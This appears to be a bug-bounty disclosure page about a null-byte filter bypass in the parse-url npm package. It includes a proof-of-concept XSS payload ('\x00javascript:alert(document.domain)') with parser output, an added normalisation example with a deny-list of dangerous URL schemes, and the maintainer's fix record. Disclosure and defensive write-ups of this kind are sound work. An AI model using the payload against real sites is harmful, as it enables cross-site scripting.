Improper Input Validation in ionicabizau/parse-url

Valid

Reported on

Feb 24th 2022


Description

If an attacker inserts a null byte at the beginning of the `javascript:` scheme, parse-url does not recognise the scheme: as the proof of concept below shows, the input is parsed as an SSH address (protocol `ssh`, resource `\u0000javascript`) rather than as a `javascript:` URL, while a browser strips the leading control character and executes the script. Any filter that relies on parse-url's `protocol` field to reject `javascript:` URLs can therefore be bypassed. All null bytes must be removed before parsing.

Proof of Concept

const parseUrl = require("parse-url")
// A leading null byte hides the javascript: scheme; no error is raised, the URL is silently misparsed.
const url = parseUrl("\x00javascript:alert(document.domain)")
console.log(url)

output

{
  protocols: [],
  protocol: 'ssh',
  port: null,
  resource: '\u0000javascript',
  user: '',
  pathname: '/alert(document.domain)',
  hash: '',
  search: '',
  href: '\u0000javascript:alert(document.domain)',
  query: [Object: null prototype] {}
}
location.href = '\u0000javascript:alert(document.domain)'

The same string executes in browsers: the browser's URL parser strips leading control characters, so the null byte does not stop the `javascript:` scheme from being recognised.
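As an added example (not parse-url's code and not part of the original report), the following shows why the filter bypass works and how to pre-process input before scheme detection. It contrasts a naive scheme check, which a leading null byte defeats, with Node's WHATWG-compliant `URL` class, which behaves like a browser, and with a normalisation step that mirrors the URL Standard: strip leading and trailing C0 controls and spaces, then remove tabs and newlines anywhere. That goes slightly beyond the report, which only mentions null bytes, because browsers strip the whole C0 range, not just `\x00`. The sample inputs and the `DANGEROUS_SCHEMES` list are constructed for the example.

```javascript
// Added example: browser-style URL normalisation before scheme detection.
// Not parse-url's code; sample inputs below are constructed for illustration.

const SCHEME_RE = /^([a-zA-Z][a-zA-Z0-9+.-]*):/;

// Naive scheme extraction, as a server-side filter might do it.
// "\x00javascript:..." has no letter at index 0, so this returns null.
function naiveScheme(input) {
  const m = SCHEME_RE.exec(String(input));
  return m ? m[1].toLowerCase() : null;
}

// Mirror the WHATWG URL Standard's pre-processing of the input string:
//   1. strip leading and trailing C0 controls (U+0000..U+001F) and U+0020 space
//   2. remove ASCII tab, LF and CR anywhere in the string
function normalizeLikeBrowser(input) {
  return String(input)
    .replace(/^[\u0000-\u0020]+|[\u0000-\u0020]+$/g, '')
    .replace(/[\t\n\r]/g, '');
}

// Scheme as a browser would see it, computed from the normalised string.
function normalizedScheme(input) {
  return naiveScheme(normalizeLikeBrowser(input));
}

// Ground truth: what Node's WHATWG URL implementation reports (same rules as a browser).
function browserScheme(input) {
  try {
    return new URL(input).protocol; // e.g. 'javascript:'
  } catch (e) {
    return null; // not an absolute URL
  }
}

// Hypothetical deny-list for a link filter; schemes that run script or embed content.
const DANGEROUS_SCHEMES = new Set(['javascript', 'data', 'vbscript']);

function isDangerousUrl(input) {
  const scheme = normalizedScheme(input);
  return scheme !== null && DANGEROUS_SCHEMES.has(scheme);
}

// Constructed sample inputs: the report's payload plus two variants browsers also accept.
const SAMPLES = [
  'javascript:alert(document.domain)',
  '\x00javascript:alert(document.domain)',
  '\t java\nscript:alert(document.domain)',
  'https://example.com/',
];

for (const s of SAMPLES) {
  console.log(JSON.stringify(s), {
    naive: naiveScheme(s),          // null for the null-byte payload
    browser: browserScheme(s),      // 'javascript:' for the null-byte payload
    dangerous: isDangerousUrl(s),   // true for the null-byte payload
  });
}
```

The practical rule: run the normalisation (or simply `new URL(input)`) and inspect the resulting scheme, never the raw string, before deciding whether a URL is safe to emit into an `href`.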

Pocas (Researcher), 2 years ago:

const parser = require('url-parse');
console.log(parser("\x00javascript:alert(document.domain)"))

output

{
  slashes: false,
  protocol: 'javascript:',
  hash: '',
  query: '',
  pathname: 'alert(document.domain)',
  auth: '',
  host: '',
  port: '',
  hostname: '',
  password: '',
  username: '',
  origin: 'null',
  href: 'javascript:alert(document.domain)'
}

Above is the return value of the unshiftio/url-parse module.

Ionică Bizău (Johnny B.) validated this vulnerability 2 years ago
Pocas has been awarded the disclosure bounty
Pocas (Researcher), 2 years ago:

Hello! When will you fix it?

Ionică Bizău (Johnny B.) marked this as fixed in 7.0.0 with commit 21c72a a year ago
Ionică Bizău (Johnny B.) has been awarded the fix bounty
This vulnerability will not receive a CVE